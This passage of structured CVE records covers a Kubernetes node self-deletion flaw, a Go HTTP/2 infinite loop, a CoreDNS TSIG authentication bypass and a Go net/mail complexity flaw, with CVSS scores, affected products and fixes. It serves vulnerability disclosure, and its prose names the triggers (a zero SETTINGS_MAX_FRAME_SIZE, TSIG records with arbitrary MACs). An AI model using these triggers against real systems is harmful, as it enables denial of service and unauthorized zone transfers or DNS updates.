"dateUpdated": "2026-05-08T21:29:53.674Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-5187 (GCVE-0-2025-5187)
Vulnerability from cvelistv5 – Published: 2025-08-27 16:20 – Updated: 2026-02-26 17:47- CWE-863 - Incorrect Authorization
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Kubernetes | Kubernetes |
Affected:
v1.31.0 , ≤ v1.31.11
(custom)
Affected: v1.32.0 , ≤ v1.32.7 (custom) Affected: v1.33.0 , ≤ v1.33.3 (custom) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-5187",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-28T03:55:27.614711Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T17:47:59.242Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Kubernetes",
"vendor": "Kubernetes",
"versions": [
{
"lessThanOrEqual": "v1.31.11",
"status": "affected",
"version": "v1.31.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.32.7",
"status": "affected",
"version": "v1.32.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "v1.33.3",
"status": "affected",
"version": "v1.33.0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Paul Viossat"
}
],
"datePublic": "2025-08-13T20:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A vulnerability exists in the NodeRestriction admission controller in Kubernetes clusters where node users can delete their corresponding node object by patching themselves with an OwnerReference to a cluster-scoped resource. If the OwnerReference resource does not exist or is subsequently deleted, the given node object will be deleted via garbage collection."
}
],
"value": "A vulnerability exists in the NodeRestriction admission controller in Kubernetes clusters where node users can delete their corresponding node object by patching themselves with an OwnerReference to a cluster-scoped resource. If the OwnerReference resource does not exist or is subsequently deleted, the given node object will be deleted via garbage collection."
}
],
"impacts": [
{
"capecId": "CAPEC-554",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-554 Functionality Bypass"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-27T16:20:56.778Z",
"orgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"shortName": "kubernetes"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/133471"
},
{
"tags": [
"mailing-list"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/znSNY7XCztE"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To mitigate this vulnerability, upgrade Kubernetes: \u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/\"\u003ehttps://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "To mitigate this vulnerability, upgrade Kubernetes: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Nodes can delete themselves by adding an OwnerReference",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"assignerShortName": "kubernetes",
"cveId": "CVE-2025-5187",
"datePublished": "2025-08-27T16:20:56.778Z",
"dateReserved": "2025-05-25T18:24:14.173Z",
"dateUpdated": "2026-02-26T17:47:59.242Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33814 (GCVE-0-2026-33814)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-07-02 12:05- CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| golang.org/x/net | golang.org/x/net/http2 |
Affected:
0 , < 0.53.0
(semver)
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-33814",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T18:00:53.951676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T18:01:02.989Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:cluster_observability_operator:1.5::el9"
],
"defaultStatus": "affected",
"product": "Cluster Observability Operator 1.5.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "affected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.0::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.1::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:container_native_virtualization:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Virtualization 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:2"
],
"defaultStatus": "unaffected",
"product": "OpenShift Service Mesh 2",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-07T19:41:17.631Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the HTTP/2 protocol implementation within the Go standard library (golang.org/x/net and net/http/internal/http2). A remote attacker can exploit this vulnerability by sending a specially crafted HTTP/2 SETTINGS frame with the SETTINGS_MAX_FRAME_SIZE parameter set to zero. This malicious frame causes the transport layer to enter an infinite loop of writing CONTINUATION frames, leading to resource exhaustion and a Denial of Service (DoS) condition."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-606",
"description": "Unchecked Input for Loop Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-02T12:05:19.070Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-33814"
},
{
"name": "RHBZ#2467815",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467815"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33814.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34342"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23262"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23264"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33120"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33123"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33142"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33150"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:34342: Cluster Observability Operator 1.5.0"
},
{
"lang": "en",
"value": "RHSA-2026:23262: Red Hat Hardened Images"
},
{
"lang": "en",
"value": "RHSA-2026:23264: Red Hat Hardened Images"
},
{
"lang": "en",
"value": "RHSA-2026:33120: Red Hat OpenShift Service Mesh 3.0"
},
{
"lang": "en",
"value": "RHSA-2026:33123: Red Hat OpenShift Service Mesh 3.1"
},
{
"lang": "en",
"value": "RHSA-2026:33142: Red Hat OpenShift Service Mesh 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:33150: Red Hat OpenShift Service Mesh 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-07T20:01:11.324Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-07T19:41:17.631Z",
"value": "Made public."
}
],
"title": "net/http/internal/http2: golang: golang.org/x/net: Go HTTP/2: Denial of Service via malformed SETTINGS_MAX_FRAME_SIZE frame",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "golang.org/x/net/http2",
"product": "golang.org/x/net/http2",
"programRoutines": [
{
"name": "clientConnReadLoop.processSettingsNoWrite"
},
{
"name": "Transport.NewClientConn"
},
{
"name": "Transport.RoundTrip"
},
{
"name": "Transport.RoundTripOpt"
},
{
"name": "clientConnPool.GetClientConn"
},
{
"name": "noDialClientConnPool.GetClientConn"
},
{
"name": "noDialH2RoundTripper.NewClientConn"
},
{
"name": "noDialH2RoundTripper.RoundTrip"
},
{
"name": "unencryptedTransport.RoundTrip"
}
],
"vendor": "golang.org/x/net",
"versions": [
{
"lessThan": "0.53.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net/http",
"product": "net/http",
"programRoutines": [
{
"name": "http2clientConnReadLoop.processSettingsNoWrite"
},
{
"name": "Client.CloseIdleConnections"
},
{
"name": "Client.Do"
},
{
"name": "Client.Get"
},
{
"name": "Client.Head"
},
{
"name": "Client.Post"
},
{
"name": "Client.PostForm"
},
{
"name": "ClientConn.Close"
},
{
"name": "ClientConn.RoundTrip"
},
{
"name": "Get"
},
{
"name": "Head"
},
{
"name": "Post"
},
{
"name": "PostForm"
},
{
"name": "Transport.CloseIdleConnections"
},
{
"name": "Transport.NewClientConn"
},
{
"name": "Transport.RoundTrip"
},
{
"name": "http1ClientConn.Close"
},
{
"name": "http1ClientConn.RoundTrip"
},
{
"name": "http2Transport.NewClientConn"
},
{
"name": "http2Transport.RoundTrip"
},
{
"name": "http2Transport.RoundTripOpt"
},
{
"name": "http2clientConnPool.GetClientConn"
},
{
"name": "http2noDialClientConnPool.GetClientConn"
},
{
"name": "http2noDialH2RoundTripper.NewClientConn"
},
{
"name": "http2noDialH2RoundTripper.RoundTrip"
},
{
"name": "http2unencryptedTransport.RoundTrip"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Marwan Atia (marwansamir688@gmail.com)"
}
],
"descriptions": [
{
"lang": "en",
"value": "When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:17.631Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/cl/761581"
},
{
"url": "https://go.dev/cl/761640"
},
{
"url": "https://go.dev/issue/78476"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4918"
}
],
"title": "Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-33814",
"datePublished": "2026-05-07T19:41:17.631Z",
"dateReserved": "2026-03-23T20:35:32.814Z",
"dateUpdated": "2026-07-02T12:05:19.070Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-35579 (GCVE-0-2026-35579)
Vulnerability from cvelistv5 – Published: 2026-05-05 20:29 – Updated: 2026-06-30 12:09- CWE-287 - Improper Authentication
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-35579",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-06T14:30:00.602863Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T14:30:35.454Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:acm:2.14::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-05T20:29:16.903Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in CoreDNS. An unauthenticated network attacker can exploit incorrect handling of TSIG (Transaction Signature) authentication in the gRPC, QUIC, DoH (DNS over HTTPS), and DoH3 transport implementations. This vulnerability allows an attacker to bypass TSIG protection, leading to unauthorized access to functionalities such as zone transfers and dynamic DNS updates. For DoH and DoH3, the issue is more severe as any request with a TSIG record is treated as authenticated, even with an invalid key."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-303",
"description": "Incorrect Implementation of Authentication Algorithm",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-30T12:09:02.357Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-35579"
},
{
"name": "RHBZ#2466905",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466905"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-35579.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:25127: Red Hat Advanced Cluster Management for Kubernetes 2.14"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-05T21:01:06.423Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-05T20:29:16.903Z",
"value": "Made public."
}
],
"title": "github.com/coredns/coredns: CoreDNS: Authentication bypass allows unauthorized access to TSIG-protected functionalities",
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server written in Go. In versions prior to 1.14.3, the gRPC, QUIC, DoH, and DoH3 transport implementations incorrectly handle TSIG authentication. For gRPC and QUIC, the server checks whether the TSIG key name exists in the configuration but never calls dns.TsigVerify() to validate the HMAC. If the key name matches a configured key, the tsigStatus field remains nil and the tsig plugin treats the request as successfully authenticated regardless of the MAC value. For DoH and DoH3, the issue is more severe: the DoHWriter.TsigStatus() method unconditionally returns nil, and the server never inspects the TSIG record at all. Any request containing a TSIG record is treated as authenticated over DoH and DoH3, even if the key name is invalid and the MAC is arbitrary.\n\nAn unauthenticated network attacker can exploit this to bypass TSIG-protected functionality such as AXFR/IXFR zone transfers, dynamic DNS updates, or other TSIG-gated plugin behavior. The DoH and DoH3 variants have a lower exploitation bar because the attacker does not need to know a valid TSIG key name.\n\nThis issue has been fixed in version 1.14.3. As a workaround, disable gRPC, QUIC, DoH, and DoH3 listeners where TSIG authentication is required, or restrict network-level access to affected transport ports to trusted sources only."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T20:29:16.903Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9"
}
],
"source": {
"advisory": "GHSA-vp29-5652-4fw9",
"discovery": "UNKNOWN"
},
"title": "CoreDNS TSIG authentication bypass on gRPC, QUIC, DoH, and DoH3 transports"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-35579",
"datePublished": "2026-05-05T20:29:16.903Z",
"dateReserved": "2026-04-03T20:09:02.827Z",
"dateUpdated": "2026-06-30T12:09:02.357Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-42499 (GCVE-0-2026-42499)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-07-03 12:05- CWE-407 - Inefficient Algorithmic Complexity
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | net/mail |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-42499",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T16:55:28.873015Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T21:29:59.662Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:logging:6.4::el9"
],
"defaultStatus": "affected",
"product": "Logging Subsystem for Red Hat OpenShift 6.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.0::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.1::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:assisted_installer:2"
],
"defaultStatus": "affected",
"product": "Assisted Installer for Red Hat OpenShift Container Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cert_manager:1"
],
"defaultStatus": "affected",
"product": "cert-manager Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:confidential_compute_attestation:1"
],
"defaultStatus": "affected",
"product": "Confidential Compute Attestation",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "affected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_custom_metrics_autoscaler:2"
],
"defaultStatus": "affected",
"product": "Custom Metric Autoscaler operator for Red Hat Openshift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:external_secrets_operator:1"
],
"defaultStatus": "affected",
"product": "External Secrets Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_file_integrity_operator:1"
],
"defaultStatus": "affected",
"product": "File Integrity Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lvms:4"
],
"defaultStatus": "affected",
"product": "Logical Volume Manager Storage",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:migration_toolkit_applications:8"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Applications 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhmt:1"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multiarch_tuning_operator"
],
"defaultStatus": "affected",
"product": "Multiarch Tuning Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:network_observ_optr:1"
],
"defaultStatus": "affected",
"product": "Network Observability Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_api_data_protection:1"
],
"defaultStatus": "affected",
"product": "OpenShift API for Data Protection",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ocp_tools"
],
"defaultStatus": "affected",
"product": "OpenShift Developer Tools and Services",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_pipelines:1"
],
"defaultStatus": "affected",
"product": "OpenShift Pipelines",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:serverless:1"
],
"defaultStatus": "affected",
"product": "OpenShift Serverless",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:2"
],
"defaultStatus": "affected",
"product": "OpenShift Service Mesh 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3"
],
"defaultStatus": "affected",
"product": "OpenShift Service Mesh 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_power_monitoring"
],
"defaultStatus": "affected",
"product": "Power monitoring for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:advanced_cluster_security:4"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Security 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:5"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:6"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:9"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:certifications:9"
],
"defaultStatus": "affected",
"product": "Red Hat Certification Program for Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
